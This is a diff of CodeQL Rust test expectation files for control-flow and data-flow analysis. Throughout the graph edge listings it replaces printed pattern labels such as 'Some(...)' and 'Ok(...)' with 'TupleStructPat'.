@@ -663,19 +663,19 @@ edges | test.rs:307:19:307:42 | ...: Option::<...> | test.rs:308:15:308:25 | maybe_digit | | | test.rs:307:52:313:5 | { ... } | test.rs:307:5:313:5 | exit fn test_match (normal) | | | test.rs:308:9:312:9 | match maybe_digit { ... } | test.rs:307:52:313:5 | { ... } | | -| test.rs:308:15:308:25 | maybe_digit | test.rs:309:13:309:27 | ...::Some(...) | | -| test.rs:309:13:309:27 | ...::Some(...) | test.rs:309:26:309:26 | x | match | -| test.rs:309:13:309:27 | ...::Some(...) | test.rs:310:13:310:27 | ...::Some(...) | no-match | +| test.rs:308:15:308:25 | maybe_digit | test.rs:309:13:309:27 | TupleStructPat | | +| test.rs:309:13:309:27 | TupleStructPat | test.rs:309:26:309:26 | x | match | +| test.rs:309:13:309:27 | TupleStructPat | test.rs:310:13:310:27 | TupleStructPat | no-match | | test.rs:309:26:309:26 | x | test.rs:309:32:309:32 | x | match | | test.rs:309:32:309:32 | x | test.rs:309:36:309:37 | 10 | | | test.rs:309:32:309:37 | ... < ... | test.rs:309:42:309:42 | x | true | -| test.rs:309:32:309:37 | ... < ... | test.rs:310:13:310:27 | ...::Some(...) | false | +| test.rs:309:32:309:37 | ... < ... | test.rs:310:13:310:27 | TupleStructPat | false | | test.rs:309:36:309:37 | 10 | test.rs:309:32:309:37 | ... < ... | | | test.rs:309:42:309:42 | x | test.rs:309:46:309:46 | 5 | | | test.rs:309:42:309:46 | ... + ... | test.rs:308:9:312:9 | match maybe_digit { ... } | | | test.rs:309:46:309:46 | 5 | test.rs:309:42:309:46 | ... + ... | | -| test.rs:310:13:310:27 | ...::Some(...) | test.rs:310:26:310:26 | x | match | -| test.rs:310:13:310:27 | ...::Some(...) | test.rs:311:13:311:24 | ...::None | no-match | +| test.rs:310:13:310:27 | TupleStructPat | test.rs:310:26:310:26 | x | match | +| test.rs:310:13:310:27 | TupleStructPat | test.rs:311:13:311:24 | ...::None | no-match | | test.rs:310:26:310:26 | x | test.rs:310:32:310:32 | x | match | | test.rs:310:32:310:32 | x | test.rs:308:9:312:9 | match maybe_digit { ... 
} | | | test.rs:311:13:311:24 | ...::None | test.rs:311:29:311:29 | 5 | match | @@ -686,7 +686,7 @@ edges | test.rs:315:44:315:67 | ...: Option::<...> | test.rs:316:19:316:29 | maybe_digit | | | test.rs:315:77:324:5 | { ... } | test.rs:315:5:324:5 | exit fn test_match_with_return_in_scrutinee (normal) | | | test.rs:316:9:323:9 | match ... { ... } | test.rs:315:77:324:5 | { ... } | | -| test.rs:316:16:320:9 | if ... {...} else {...} | test.rs:321:13:321:27 | ...::Some(...) | | +| test.rs:316:16:320:9 | if ... {...} else {...} | test.rs:321:13:321:27 | TupleStructPat | | | test.rs:316:19:316:29 | maybe_digit | test.rs:316:34:316:37 | Some | | | test.rs:316:19:316:40 | ... == ... | test.rs:317:13:317:21 | ExprStmt | true | | test.rs:316:19:316:40 | ... == ... | test.rs:319:13:319:23 | maybe_digit | false | @@ -698,8 +698,8 @@ edges | test.rs:317:20:317:20 | 3 | test.rs:317:13:317:20 | return 3 | | | test.rs:318:16:320:9 | { ... } | test.rs:316:16:320:9 | if ... {...} else {...} | | | test.rs:319:13:319:23 | maybe_digit | test.rs:318:16:320:9 | { ... } | | -| test.rs:321:13:321:27 | ...::Some(...) | test.rs:321:26:321:26 | x | match | -| test.rs:321:13:321:27 | ...::Some(...) | test.rs:322:13:322:24 | ...::None | no-match | +| test.rs:321:13:321:27 | TupleStructPat | test.rs:321:26:321:26 | x | match | +| test.rs:321:13:321:27 | TupleStructPat | test.rs:322:13:322:24 | ...::None | no-match | | test.rs:321:26:321:26 | x | test.rs:321:32:321:32 | x | match | | test.rs:321:32:321:32 | x | test.rs:321:36:321:36 | 5 | | | test.rs:321:32:321:36 | ... + ... | test.rs:316:9:323:9 | match ... { ... } | | 
@@ -716,9 +716,9 @@ edges | test.rs:327:9:330:18 | ... && ... | test.rs:326:60:331:5 | { ... } | | | test.rs:327:10:330:9 | [boolean(false)] match r { ... } | test.rs:327:9:330:18 | ... && ... | false | | test.rs:327:10:330:9 | [boolean(true)] match r { ... } | test.rs:330:15:330:18 | cond | true | -| test.rs:327:16:327:16 | r | test.rs:328:13:328:19 | Some(...) | | -| test.rs:328:13:328:19 | Some(...) | test.rs:328:18:328:18 | a | match | -| test.rs:328:13:328:19 | Some(...) | test.rs:329:13:329:13 | _ | no-match | +| test.rs:327:16:327:16 | r | test.rs:328:13:328:19 | TupleStructPat | | +| test.rs:328:13:328:19 | TupleStructPat | test.rs:328:18:328:18 | a | match | +| test.rs:328:13:328:19 | TupleStructPat | test.rs:329:13:329:13 | _ | no-match | | test.rs:328:18:328:18 | a | test.rs:328:24:328:24 | a | match | | test.rs:328:24:328:24 | a | test.rs:327:10:330:9 | [boolean(false)] match r { ... } | false | | test.rs:328:24:328:24 | a | test.rs:327:10:330:9 | [boolean(true)] match r { ... } | true | 
@@ -731,12 +731,12 @@ edges | test.rs:333:35:333:58 | ...: Result::<...> | test.rs:334:15:334:15 | r | | | test.rs:333:66:338:5 | { ... } | test.rs:333:5:338:5 | exit fn test_match_with_no_arms (normal) | | | test.rs:334:9:337:9 | match r { ... } | test.rs:333:66:338:5 | { ... } | | -| test.rs:334:15:334:15 | r | test.rs:335:13:335:21 | Ok(...) | | -| test.rs:335:13:335:21 | Ok(...) | test.rs:335:16:335:20 | value | match | -| test.rs:335:13:335:21 | Ok(...) | test.rs:336:13:336:22 | Err(...) | no-match | +| test.rs:334:15:334:15 | r | test.rs:335:13:335:21 | TupleStructPat | | +| test.rs:335:13:335:21 | TupleStructPat | test.rs:335:16:335:20 | value | match | +| test.rs:335:13:335:21 | TupleStructPat | test.rs:336:13:336:22 | TupleStructPat | no-match | | test.rs:335:16:335:20 | value | test.rs:335:26:335:30 | value | match | | test.rs:335:26:335:30 | value | test.rs:334:9:337:9 | match r { ... } | | -| test.rs:336:13:336:22 | Err(...) | test.rs:336:17:336:21 | never | match | +| test.rs:336:13:336:22 | TupleStructPat | test.rs:336:17:336:21 | never | match | | test.rs:336:17:336:21 | never | test.rs:336:33:336:37 | never | match | | test.rs:336:27:336:40 | match never { ... } | test.rs:334:9:337:9 | match r { ... } | | | test.rs:336:33:336:37 | never | test.rs:336:27:336:40 | match never { ... } | | 
@@ -746,10 +746,10 @@ edges | test.rs:343:23:343:36 | ...: Option::<...> | test.rs:344:9:344:57 | let ... = a else {...} | | | test.rs:343:46:346:5 | { ... } | test.rs:343:5:346:5 | exit fn test_let_match (normal) | | | test.rs:344:9:344:57 | let ... = a else {...} | test.rs:344:23:344:23 | a | | -| test.rs:344:13:344:19 | Some(...) | test.rs:344:18:344:18 | n | match | -| test.rs:344:13:344:19 | Some(...) | test.rs:344:39:344:53 | MacroStmts | no-match | +| test.rs:344:13:344:19 | TupleStructPat | test.rs:344:18:344:18 | n | match | +| test.rs:344:13:344:19 | TupleStructPat | test.rs:344:39:344:53 | MacroStmts | no-match | | test.rs:344:18:344:18 | n | test.rs:345:9:345:9 | n | match | -| test.rs:344:23:344:23 | a | test.rs:344:13:344:19 | Some(...) | | +| test.rs:344:23:344:23 | a | test.rs:344:13:344:19 | TupleStructPat | | | test.rs:344:32:344:54 | ...::panic_fmt | test.rs:344:39:344:53 | "Expected some" | | | test.rs:344:32:344:54 | MacroExpr | test.rs:344:30:344:56 | { ... } | | | test.rs:344:39:344:53 | "Expected some" | test.rs:344:39:344:53 | FormatArgsExpr | | 
@@ -770,9 +770,9 @@ edges | test.rs:349:9:352:10 | let ... = ... | test.rs:349:25:349:25 | m | | | test.rs:349:13:349:15 | ret | test.rs:353:9:353:12 | true | match | | test.rs:349:19:352:9 | match m { ... } | test.rs:349:13:349:15 | ret | | -| test.rs:349:25:349:25 | m | test.rs:350:13:350:21 | Some(...) | | -| test.rs:350:13:350:21 | Some(...) | test.rs:350:18:350:20 | ret | match | -| test.rs:350:13:350:21 | Some(...) | test.rs:351:13:351:16 | None | no-match | +| test.rs:349:25:349:25 | m | test.rs:350:13:350:21 | TupleStructPat | | +| test.rs:350:13:350:21 | TupleStructPat | test.rs:350:18:350:20 | ret | match | +| test.rs:350:13:350:21 | TupleStructPat | test.rs:351:13:351:16 | None | no-match | | test.rs:350:18:350:20 | ret | test.rs:350:26:350:28 | ret | match | | test.rs:350:26:350:28 | ret | test.rs:349:19:352:9 | match m { ... } | | | test.rs:351:13:351:16 | None | test.rs:351:28:351:32 | false | match | @@ -1030,10 +1030,10 @@ edges | test.rs:484:13:484:13 | x | test.rs:485:9:487:10 | let ... = x else {...} | match | | test.rs:484:30:484:33 | None | test.rs:484:13:484:13 | x | | | test.rs:485:9:487:10 | let ... = x else {...} | test.rs:485:23:485:23 | x | | -| test.rs:485:13:485:19 | Some(...) | test.rs:485:18:485:18 | y | match | -| test.rs:485:13:485:19 | Some(...) | test.rs:486:13:486:27 | ExprStmt | no-match | +| test.rs:485:13:485:19 | TupleStructPat | test.rs:485:18:485:18 | y | match | +| test.rs:485:13:485:19 | TupleStructPat | test.rs:486:13:486:27 | ExprStmt | no-match | | test.rs:485:18:485:18 | y | test.rs:488:9:488:9 | 0 | match | -| test.rs:485:23:485:23 | x | test.rs:485:13:485:19 | Some(...) | | +| test.rs:485:23:485:23 | x | test.rs:485:13:485:19 | TupleStructPat | | | test.rs:486:13:486:26 | break ''block 1 | test.rs:483:18:489:5 | 'block: { ... } | break | | test.rs:486:13:486:27 | ExprStmt | test.rs:486:26:486:26 | 1 | | | test.rs:486:26:486:26 | 1 | test.rs:486:13:486:26 | break ''block 1 | | 
diff --git a/rust/ql/test/library-tests/dataflow/local/DataFlowStep.expected b/rust/ql/test/library-tests/dataflow/local/DataFlowStep.expected index 5e244550ff3..bc36656e49d 100644 --- a/rust/ql/test/library-tests/dataflow/local/DataFlowStep.expected +++ b/rust/ql/test/library-tests/dataflow/local/DataFlowStep.expected @@ -34,7 +34,7 @@ localStep | main.rs:32:9:32:9 | [SSA] b | main.rs:36:10:36:10 | b | | main.rs:32:9:32:9 | b | main.rs:32:9:32:9 | [SSA] b | | main.rs:32:13:35:5 | match m { ... } | main.rs:32:9:32:9 | b | -| main.rs:32:19:32:19 | m | main.rs:33:9:33:15 | Some(...) | +| main.rs:32:19:32:19 | m | main.rs:33:9:33:15 | TupleStructPat | | main.rs:32:19:32:19 | m | main.rs:34:9:34:12 | None | | main.rs:33:20:33:20 | a | main.rs:32:13:35:5 | match m { ... } | | main.rs:34:17:34:17 | 0 | main.rs:32:13:35:5 | match m { ... } | @@ -169,14 +169,14 @@ localStep | main.rs:199:9:199:10 | [SSA] s2 | main.rs:204:11:204:12 | s2 | | main.rs:199:9:199:10 | s2 | main.rs:199:9:199:10 | [SSA] s2 | | main.rs:199:14:199:28 | ...::Some(...) | main.rs:199:9:199:10 | s2 | -| main.rs:200:11:200:12 | s1 | main.rs:201:9:201:23 | ...::Some(...) | +| main.rs:200:11:200:12 | s1 | main.rs:201:9:201:23 | TupleStructPat | | main.rs:200:11:200:12 | s1 | main.rs:202:9:202:20 | ...::None | | main.rs:201:22:201:22 | [SSA] n | main.rs:201:33:201:33 | n | | main.rs:201:22:201:22 | n | main.rs:201:22:201:22 | [SSA] n | | main.rs:201:28:201:34 | sink(...) | main.rs:200:5:203:5 | match s1 { ... } | | main.rs:202:25:202:31 | sink(...) | main.rs:200:5:203:5 | match s1 { ... } | | main.rs:204:5:207:5 | match s2 { ... } | main.rs:197:37:208:1 | { ... } | -| main.rs:204:11:204:12 | s2 | main.rs:205:9:205:23 | ...::Some(...) | +| main.rs:204:11:204:12 | s2 | main.rs:205:9:205:23 | TupleStructPat | | main.rs:204:11:204:12 | s2 | main.rs:206:9:206:20 | ...::None | | main.rs:205:22:205:22 | [SSA] n | main.rs:205:33:205:33 | n | | main.rs:205:22:205:22 | n | main.rs:205:22:205:22 | [SSA] n | 
@@ -188,14 +188,14 @@ localStep | main.rs:212:9:212:10 | [SSA] s2 | main.rs:217:11:217:12 | s2 | | main.rs:212:9:212:10 | s2 | main.rs:212:9:212:10 | [SSA] s2 | | main.rs:212:14:212:20 | Some(...) | main.rs:212:9:212:10 | s2 | -| main.rs:213:11:213:12 | s1 | main.rs:214:9:214:15 | Some(...) | +| main.rs:213:11:213:12 | s1 | main.rs:214:9:214:15 | TupleStructPat | | main.rs:213:11:213:12 | s1 | main.rs:215:9:215:12 | None | | main.rs:214:14:214:14 | [SSA] n | main.rs:214:25:214:25 | n | | main.rs:214:14:214:14 | n | main.rs:214:14:214:14 | [SSA] n | | main.rs:214:20:214:26 | sink(...) | main.rs:213:5:216:5 | match s1 { ... } | | main.rs:215:17:215:23 | sink(...) | main.rs:213:5:216:5 | match s1 { ... } | | main.rs:217:5:220:5 | match s2 { ... } | main.rs:210:39:221:1 | { ... } | -| main.rs:217:11:217:12 | s2 | main.rs:218:9:218:15 | Some(...) | +| main.rs:217:11:217:12 | s2 | main.rs:218:9:218:15 | TupleStructPat | | main.rs:217:11:217:12 | s2 | main.rs:219:9:219:12 | None | | main.rs:218:14:218:14 | [SSA] n | main.rs:218:25:218:25 | n | | main.rs:218:14:218:14 | n | main.rs:218:14:218:14 | [SSA] n | @@ -210,8 +210,8 @@ localStep | main.rs:235:9:235:10 | [SSA] s2 | main.rs:243:11:243:12 | s2 | | main.rs:235:9:235:10 | s2 | main.rs:235:9:235:10 | [SSA] s2 | | main.rs:235:14:235:30 | ...::B(...) | main.rs:235:9:235:10 | s2 | -| main.rs:236:11:236:12 | s1 | main.rs:237:9:237:25 | ...::A(...) | -| main.rs:236:11:236:12 | s1 | main.rs:238:9:238:25 | ...::B(...) | +| main.rs:236:11:236:12 | s1 | main.rs:237:9:237:25 | TupleStructPat | +| main.rs:236:11:236:12 | s1 | main.rs:238:9:238:25 | TupleStructPat | | main.rs:236:11:236:12 | s1 | main.rs:240:11:240:12 | s1 | | main.rs:237:24:237:24 | [SSA] n | main.rs:237:35:237:35 | n | | main.rs:237:24:237:24 | n | main.rs:237:24:237:24 | [SSA] n | 
@@ -220,8 +220,8 @@ localStep | main.rs:238:24:238:24 | n | main.rs:238:24:238:24 | [SSA] n | | main.rs:238:30:238:36 | sink(...) | main.rs:236:5:239:5 | match s1 { ... } | | main.rs:240:11:240:12 | s1 | main.rs:241:9:241:45 | ... \| ... | -| main.rs:241:9:241:45 | ... \| ... | main.rs:241:9:241:25 | ...::A(...) | -| main.rs:241:9:241:45 | ... \| ... | main.rs:241:29:241:45 | ...::B(...) | +| main.rs:241:9:241:45 | ... \| ... | main.rs:241:9:241:25 | TupleStructPat | +| main.rs:241:9:241:45 | ... \| ... | main.rs:241:29:241:45 | TupleStructPat | | main.rs:241:9:241:45 | [SSA] [match(true)] phi | main.rs:241:55:241:55 | n | | main.rs:241:24:241:24 | [SSA] [input] [match(true)] phi | main.rs:241:9:241:45 | [SSA] [match(true)] phi | | main.rs:241:24:241:24 | [SSA] n | main.rs:241:24:241:24 | [SSA] [input] [match(true)] phi | @@ -231,8 +231,8 @@ localStep | main.rs:241:44:241:44 | n | main.rs:241:44:241:44 | [SSA] n | | main.rs:241:50:241:56 | sink(...) | main.rs:240:5:242:5 | match s1 { ... } | | main.rs:243:5:246:5 | match s2 { ... } | main.rs:233:48:247:1 | { ... } | -| main.rs:243:11:243:12 | s2 | main.rs:244:9:244:25 | ...::A(...) | -| main.rs:243:11:243:12 | s2 | main.rs:245:9:245:25 | ...::B(...) | +| main.rs:243:11:243:12 | s2 | main.rs:244:9:244:25 | TupleStructPat | +| main.rs:243:11:243:12 | s2 | main.rs:245:9:245:25 | TupleStructPat | | main.rs:244:24:244:24 | [SSA] n | main.rs:244:35:244:35 | n | | main.rs:244:24:244:24 | n | main.rs:244:24:244:24 | [SSA] n | | main.rs:244:30:244:36 | sink(...) | main.rs:243:5:246:5 | match s2 { ... } | 
@@ -245,8 +245,8 @@ localStep | main.rs:253:9:253:10 | [SSA] s2 | main.rs:261:11:261:12 | s2 | | main.rs:253:9:253:10 | s2 | main.rs:253:9:253:10 | [SSA] s2 | | main.rs:253:14:253:17 | B(...) | main.rs:253:9:253:10 | s2 | -| main.rs:254:11:254:12 | s1 | main.rs:255:9:255:12 | A(...) | -| main.rs:254:11:254:12 | s1 | main.rs:256:9:256:12 | B(...) | +| main.rs:254:11:254:12 | s1 | main.rs:255:9:255:12 | TupleStructPat | +| main.rs:254:11:254:12 | s1 | main.rs:256:9:256:12 | TupleStructPat | | main.rs:254:11:254:12 | s1 | main.rs:258:11:258:12 | s1 | | main.rs:255:11:255:11 | [SSA] n | main.rs:255:22:255:22 | n | | main.rs:255:11:255:11 | n | main.rs:255:11:255:11 | [SSA] n | @@ -255,8 +255,8 @@ localStep | main.rs:256:11:256:11 | n | main.rs:256:11:256:11 | [SSA] n | | main.rs:256:17:256:23 | sink(...) | main.rs:254:5:257:5 | match s1 { ... } | | main.rs:258:11:258:12 | s1 | main.rs:259:9:259:19 | ... \| ... | -| main.rs:259:9:259:19 | ... \| ... | main.rs:259:9:259:12 | A(...) | -| main.rs:259:9:259:19 | ... \| ... | main.rs:259:16:259:19 | B(...) | +| main.rs:259:9:259:19 | ... \| ... | main.rs:259:9:259:12 | TupleStructPat | +| main.rs:259:9:259:19 | ... \| ... | main.rs:259:16:259:19 | TupleStructPat | | main.rs:259:9:259:19 | [SSA] [match(true)] phi | main.rs:259:29:259:29 | n | | main.rs:259:11:259:11 | [SSA] [input] [match(true)] phi | main.rs:259:9:259:19 | [SSA] [match(true)] phi | | main.rs:259:11:259:11 | [SSA] n | main.rs:259:11:259:11 | [SSA] [input] [match(true)] phi | 
@@ -266,8 +266,8 @@ localStep | main.rs:259:18:259:18 | n | main.rs:259:18:259:18 | [SSA] n | | main.rs:259:24:259:30 | sink(...) | main.rs:258:5:260:5 | match s1 { ... } | | main.rs:261:5:264:5 | match s2 { ... } | main.rs:251:50:265:1 | { ... } | -| main.rs:261:11:261:12 | s2 | main.rs:262:9:262:12 | A(...) | -| main.rs:261:11:261:12 | s2 | main.rs:263:9:263:12 | B(...) | +| main.rs:261:11:261:12 | s2 | main.rs:262:9:262:12 | TupleStructPat | +| main.rs:261:11:261:12 | s2 | main.rs:263:9:263:12 | TupleStructPat | | main.rs:262:11:262:11 | [SSA] n | main.rs:262:22:262:22 | n | | main.rs:262:11:262:11 | n | main.rs:262:11:262:11 | [SSA] n | | main.rs:262:17:262:23 | sink(...) | main.rs:261:5:264:5 | match s2 { ... } | @@ -388,7 +388,7 @@ storeStep | main.rs:314:27:314:27 | 0 | Some | main.rs:314:22:314:28 | Some(...) | readStep | file://:0:0:0:0 | [summary param] self in lang:core::_::::unwrap | Some | file://:0:0:0:0 | [summary] read: Argument[self].Variant[crate::option::Option::Some(0)] in lang:core::_::::unwrap | -| main.rs:33:9:33:15 | Some(...) | Some | main.rs:33:14:33:14 | _ | +| main.rs:33:9:33:15 | TupleStructPat | Some | main.rs:33:14:33:14 | _ | | main.rs:95:10:95:10 | a | tuple.0 | main.rs:95:10:95:12 | a.0 | | main.rs:96:10:96:10 | a | tuple.1 | main.rs:96:10:96:12 | a.1 | | main.rs:109:10:109:10 | a | tuple.0 | main.rs:109:10:109:12 | a.0 | 
@@ -405,22 +405,22 @@ readStep | main.rs:151:9:151:28 | Point {...} | Point.x | main.rs:151:20:151:20 | a | | main.rs:151:9:151:28 | Point {...} | Point.y | main.rs:151:26:151:26 | b | | main.rs:183:9:186:9 | Point3D {...} | Point3D.plane | main.rs:184:20:184:33 | Point {...} | -| main.rs:201:9:201:23 | ...::Some(...) | Some | main.rs:201:22:201:22 | n | -| main.rs:205:9:205:23 | ...::Some(...) | Some | main.rs:205:22:205:22 | n | -| main.rs:214:9:214:15 | Some(...) | Some | main.rs:214:14:214:14 | n | -| main.rs:218:9:218:15 | Some(...) | Some | main.rs:218:14:218:14 | n | -| main.rs:237:9:237:25 | ...::A(...) | A | main.rs:237:24:237:24 | n | -| main.rs:238:9:238:25 | ...::B(...) | B | main.rs:238:24:238:24 | n | -| main.rs:241:9:241:25 | ...::A(...) | A | main.rs:241:24:241:24 | n | -| main.rs:241:29:241:45 | ...::B(...) | B | main.rs:241:44:241:44 | n | -| main.rs:244:9:244:25 | ...::A(...) | A | main.rs:244:24:244:24 | n | -| main.rs:245:9:245:25 | ...::B(...) | B | main.rs:245:24:245:24 | n | -| main.rs:255:9:255:12 | A(...) | A | main.rs:255:11:255:11 | n | -| main.rs:256:9:256:12 | B(...) | B | main.rs:256:11:256:11 | n | -| main.rs:259:9:259:12 | A(...) | A | main.rs:259:11:259:11 | n | -| main.rs:259:16:259:19 | B(...) | B | main.rs:259:18:259:18 | n | -| main.rs:262:9:262:12 | A(...) | A | main.rs:262:11:262:11 | n | -| main.rs:263:9:263:12 | B(...) 
| B | main.rs:263:11:263:11 | n | +| main.rs:201:9:201:23 | TupleStructPat | Some | main.rs:201:22:201:22 | n | +| main.rs:205:9:205:23 | TupleStructPat | Some | main.rs:205:22:205:22 | n | +| main.rs:214:9:214:15 | TupleStructPat | Some | main.rs:214:14:214:14 | n | +| main.rs:218:9:218:15 | TupleStructPat | Some | main.rs:218:14:218:14 | n | +| main.rs:237:9:237:25 | TupleStructPat | A | main.rs:237:24:237:24 | n | +| main.rs:238:9:238:25 | TupleStructPat | B | main.rs:238:24:238:24 | n | +| main.rs:241:9:241:25 | TupleStructPat | A | main.rs:241:24:241:24 | n | +| main.rs:241:29:241:45 | TupleStructPat | B | main.rs:241:44:241:44 | n | +| main.rs:244:9:244:25 | TupleStructPat | A | main.rs:244:24:244:24 | n | +| main.rs:245:9:245:25 | TupleStructPat | B | main.rs:245:24:245:24 | n | +| main.rs:255:9:255:12 | TupleStructPat | A | main.rs:255:11:255:11 | n | +| main.rs:256:9:256:12 | TupleStructPat | B | main.rs:256:11:256:11 | n | +| main.rs:259:9:259:12 | TupleStructPat | A | main.rs:259:11:259:11 | n | +| main.rs:259:16:259:19 | TupleStructPat | B | main.rs:259:18:259:18 | n | +| main.rs:262:9:262:12 | TupleStructPat | A | main.rs:262:11:262:11 | n | +| main.rs:263:9:263:12 | TupleStructPat | B | main.rs:263:11:263:11 | n | | main.rs:278:9:278:38 | ...::C {...} | C | main.rs:278:36:278:36 | n | | main.rs:279:9:279:38 | ...::D {...} | D | main.rs:279:36:279:36 | n | | main.rs:282:9:282:38 | ...::C {...} | C | main.rs:282:36:282:36 | n | diff --git a/rust/ql/test/library-tests/dataflow/local/inline-flow.expected b/rust/ql/test/library-tests/dataflow/local/inline-flow.expected index eed358827da..ed51d66a1ad 100644 --- a/rust/ql/test/library-tests/dataflow/local/inline-flow.expected +++ b/rust/ql/test/library-tests/dataflow/local/inline-flow.expected 
@@ -25,30 +25,30 @@ edges | main.rs:148:12:148:21 | source(...) | main.rs:147:13:150:5 | Point {...} [Point.x] | provenance | | | main.rs:151:9:151:28 | Point {...} [Point.x] | main.rs:151:20:151:20 | a | provenance | | | main.rs:151:20:151:20 | a | main.rs:152:10:152:10 | a | provenance | | -| main.rs:198:14:198:37 | ...::Some(...) [Some] | main.rs:201:9:201:23 | ...::Some(...) [Some] | provenance | | +| main.rs:198:14:198:37 | ...::Some(...) [Some] | main.rs:201:9:201:23 | TupleStructPat [Some] | provenance | | | main.rs:198:27:198:36 | source(...) | main.rs:198:14:198:37 | ...::Some(...) [Some] | provenance | | -| main.rs:201:9:201:23 | ...::Some(...) [Some] | main.rs:201:22:201:22 | n | provenance | | +| main.rs:201:9:201:23 | TupleStructPat [Some] | main.rs:201:22:201:22 | n | provenance | | | main.rs:201:22:201:22 | n | main.rs:201:33:201:33 | n | provenance | | -| main.rs:211:14:211:29 | Some(...) [Some] | main.rs:214:9:214:15 | Some(...) [Some] | provenance | | +| main.rs:211:14:211:29 | Some(...) [Some] | main.rs:214:9:214:15 | TupleStructPat [Some] | provenance | | | main.rs:211:19:211:28 | source(...) | main.rs:211:14:211:29 | Some(...) [Some] | provenance | | -| main.rs:214:9:214:15 | Some(...) [Some] | main.rs:214:14:214:14 | n | provenance | | +| main.rs:214:9:214:15 | TupleStructPat [Some] | main.rs:214:14:214:14 | n | provenance | | | main.rs:214:14:214:14 | n | main.rs:214:25:214:25 | n | provenance | | | main.rs:224:14:224:29 | Some(...) [Some] | main.rs:225:10:225:11 | s1 [Some] | provenance | | | main.rs:224:19:224:28 | source(...) | main.rs:224:14:224:29 | Some(...) [Some] | provenance | | | main.rs:225:10:225:11 | s1 [Some] | main.rs:225:10:225:20 | ... .unwrap(...) | provenance | | -| main.rs:234:14:234:39 | ...::A(...) [A] | main.rs:237:9:237:25 | ...::A(...) [A] | provenance | | -| main.rs:234:14:234:39 | ...::A(...) [A] | main.rs:241:9:241:25 | ...::A(...) [A] | provenance | | +| main.rs:234:14:234:39 | ...::A(...) 
[A] | main.rs:237:9:237:25 | TupleStructPat [A] | provenance | | +| main.rs:234:14:234:39 | ...::A(...) [A] | main.rs:241:9:241:25 | TupleStructPat [A] | provenance | | | main.rs:234:29:234:38 | source(...) | main.rs:234:14:234:39 | ...::A(...) [A] | provenance | | -| main.rs:237:9:237:25 | ...::A(...) [A] | main.rs:237:24:237:24 | n | provenance | | +| main.rs:237:9:237:25 | TupleStructPat [A] | main.rs:237:24:237:24 | n | provenance | | | main.rs:237:24:237:24 | n | main.rs:237:35:237:35 | n | provenance | | -| main.rs:241:9:241:25 | ...::A(...) [A] | main.rs:241:24:241:24 | n | provenance | | +| main.rs:241:9:241:25 | TupleStructPat [A] | main.rs:241:24:241:24 | n | provenance | | | main.rs:241:24:241:24 | n | main.rs:241:55:241:55 | n | provenance | | -| main.rs:252:14:252:26 | A(...) [A] | main.rs:255:9:255:12 | A(...) [A] | provenance | | -| main.rs:252:14:252:26 | A(...) [A] | main.rs:259:9:259:12 | A(...) [A] | provenance | | +| main.rs:252:14:252:26 | A(...) [A] | main.rs:255:9:255:12 | TupleStructPat [A] | provenance | | +| main.rs:252:14:252:26 | A(...) [A] | main.rs:259:9:259:12 | TupleStructPat [A] | provenance | | | main.rs:252:16:252:25 | source(...) | main.rs:252:14:252:26 | A(...) [A] | provenance | | -| main.rs:255:9:255:12 | A(...) [A] | main.rs:255:11:255:11 | n | provenance | | +| main.rs:255:9:255:12 | TupleStructPat [A] | main.rs:255:11:255:11 | n | provenance | | | main.rs:255:11:255:11 | n | main.rs:255:22:255:22 | n | provenance | | -| main.rs:259:9:259:12 | A(...) [A] | main.rs:259:11:259:11 | n | provenance | | +| main.rs:259:9:259:12 | TupleStructPat [A] | main.rs:259:11:259:11 | n | provenance | | | main.rs:259:11:259:11 | n | main.rs:259:29:259:29 | n | provenance | | | main.rs:273:14:275:5 | ...::C {...} [C] | main.rs:278:9:278:38 | ...::C {...} [C] | provenance | | | main.rs:273:14:275:5 | ...::C {...} [C] | main.rs:282:9:282:38 | ...::C {...} [C] | provenance | | 
@@ -103,12 +103,12 @@ nodes | main.rs:152:10:152:10 | a | semmle.label | a | | main.rs:198:14:198:37 | ...::Some(...) [Some] | semmle.label | ...::Some(...) [Some] | | main.rs:198:27:198:36 | source(...) | semmle.label | source(...) | -| main.rs:201:9:201:23 | ...::Some(...) [Some] | semmle.label | ...::Some(...) [Some] | +| main.rs:201:9:201:23 | TupleStructPat [Some] | semmle.label | TupleStructPat [Some] | | main.rs:201:22:201:22 | n | semmle.label | n | | main.rs:201:33:201:33 | n | semmle.label | n | | main.rs:211:14:211:29 | Some(...) [Some] | semmle.label | Some(...) [Some] | | main.rs:211:19:211:28 | source(...) | semmle.label | source(...) | -| main.rs:214:9:214:15 | Some(...) [Some] | semmle.label | Some(...) [Some] | +| main.rs:214:9:214:15 | TupleStructPat [Some] | semmle.label | TupleStructPat [Some] | | main.rs:214:14:214:14 | n | semmle.label | n | | main.rs:214:25:214:25 | n | semmle.label | n | | main.rs:224:14:224:29 | Some(...) [Some] | semmle.label | Some(...) [Some] | 
@@ -117,18 +117,18 @@ nodes | main.rs:225:10:225:20 | ... .unwrap(...) | semmle.label | ... .unwrap(...) | | main.rs:234:14:234:39 | ...::A(...) [A] | semmle.label | ...::A(...) [A] | | main.rs:234:29:234:38 | source(...) | semmle.label | source(...) | -| main.rs:237:9:237:25 | ...::A(...) [A] | semmle.label | ...::A(...) [A] | +| main.rs:237:9:237:25 | TupleStructPat [A] | semmle.label | TupleStructPat [A] | | main.rs:237:24:237:24 | n | semmle.label | n | | main.rs:237:35:237:35 | n | semmle.label | n | -| main.rs:241:9:241:25 | ...::A(...) [A] | semmle.label | ...::A(...) [A] | +| main.rs:241:9:241:25 | TupleStructPat [A] | semmle.label | TupleStructPat [A] | | main.rs:241:24:241:24 | n | semmle.label | n | | main.rs:241:55:241:55 | n | semmle.label | n | | main.rs:252:14:252:26 | A(...) [A] | semmle.label | A(...) [A] | | main.rs:252:16:252:25 | source(...) | semmle.label | source(...) | -| main.rs:255:9:255:12 | A(...) [A] | semmle.label | A(...) [A] | +| main.rs:255:9:255:12 | TupleStructPat [A] | semmle.label | TupleStructPat [A] | | main.rs:255:11:255:11 | n | semmle.label | n | | main.rs:255:22:255:22 | n | semmle.label | n | -| main.rs:259:9:259:12 | A(...) [A] | semmle.label | A(...) [A] | +| main.rs:259:9:259:12 | TupleStructPat [A] | semmle.label | TupleStructPat [A] | | main.rs:259:11:259:11 | n | semmle.label | n | | main.rs:259:29:259:29 | n | semmle.label | n | | main.rs:273:14:275:5 | ...::C {...} [C] | semmle.label | ...::C {...} [C] | diff --git a/rust/ql/test/library-tests/dataflow/models/models.expected b/rust/ql/test/library-tests/dataflow/models/models.expected index eeb9301b434..f525638282b 100644 --- a/rust/ql/test/library-tests/dataflow/models/models.expected +++ b/rust/ql/test/library-tests/dataflow/models/models.expected 
